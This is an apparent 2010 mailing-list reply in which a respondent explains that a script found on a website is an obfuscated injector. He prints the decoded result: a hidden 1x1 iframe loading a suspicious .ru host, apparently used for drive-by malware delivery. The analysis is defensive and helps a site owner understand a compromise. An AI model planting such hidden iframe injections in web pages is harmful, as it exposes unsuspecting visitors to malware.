On Wed, Aug 25, 2010 at 1:40 PM, techconnect <[email protected]> wrote: > We found this script on our website and we want to know what it > does anyone know?
It's an obfuscated code injector. The resulting HTML code looks like this: <div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://bfejbzzazbzbci.users.iframecounter.ru/?s=1"; frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div> The page at "http://bfejbzzazbzbci.users.iframecounter.ru"; doesn't appear to do anything interesting (right now). But the name looks like the kind of random string attackers often use to host their malware. If I had to guess, I'd guess your website was compromised and malicious code placed on it, so that anyone visiting your site would get nailed by the attacker from an unsuspected source. Happens all the time. -- Ben ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/> ~
